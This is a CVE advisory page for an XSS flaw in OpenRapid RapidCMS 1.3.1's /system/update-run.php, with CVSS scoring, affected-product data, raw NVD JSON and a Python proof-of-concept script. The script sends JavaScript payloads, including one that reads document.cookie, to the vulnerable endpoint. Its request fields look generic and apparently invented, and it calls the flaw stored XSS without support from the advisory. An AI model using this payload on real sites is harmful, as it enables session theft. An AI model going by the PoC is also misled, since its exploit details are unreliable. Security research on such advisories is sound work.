Security Vulnerability Report
中文
CVE-2025-64046 CVSS 6.1 MEDIUM

CVE-2025-64046

Published: 2025-11-17 16:15:51
Last Modified: 2025-11-19 13:12:00

Description

OpenRapid RapidCMS 1.3.1 is vulnerable to Cross Site Scripting (XSS) in /system/update-run.php.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:* - VULNERABLE
OpenRapid RapidCMS 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import argparse # CVE-2025-64046 PoC - OpenRapid RapidCMS XSS in /system/update-run.php # This PoC demonstrates how to inject malicious JavaScript via the update-run endpoint def exploit_xss(target_url, payload): """ Exploit stored XSS vulnerability in OpenRapid RapidCMS Args: target_url: Base URL of the vulnerable RapidCMS installation payload: Malicious JavaScript payload to inject """ # Construct the vulnerable endpoint endpoint = f"{target_url.rstrip('/')}/system/update-run.php" # Prepare the malicious data with XSS payload data = { 'update_field': payload, # Inject XSS payload 'action': 'update' } try: # Send POST request to inject the XSS payload response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[+] Payload sent successfully to {endpoint}") print(f"[+] Payload: {payload}") print("[*] The XSS payload is now stored and will execute when the page is accessed") return True else: print(f"[-] Failed to send payload. Status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-64046 XSS PoC') parser.add_argument('-u', '--url', required=True, help='Target RapidCMS URL') parser.add_argument('-p', '--payload', default='<script>alert(document.cookie)</script>', help='XSS payload') args = parser.parse_args() exploit_xss(args.url, args.payload) # Usage: python cve-2025-64046.py -u http://target.com/rapidcms -p '<img src=x onerror=alert(1)>'

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64046", "sourceIdentifier": "[email protected]", "published": "2025-11-17T16:15:50.820", "lastModified": "2025-11-19T13:11:59.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenRapid RapidCMS 1.3.1 is vulnerable to Cross Site Scripting (XSS) in /system/update-run.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA"}]}]}], "references": [{"url": "http://rapidcms.com", "source": "[email protected]", "tags": ["URL Repurposed"]}, {"url": "https://gist.github.com/b1uel0n3/c8467f156f523fcf16dc572a34693126", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}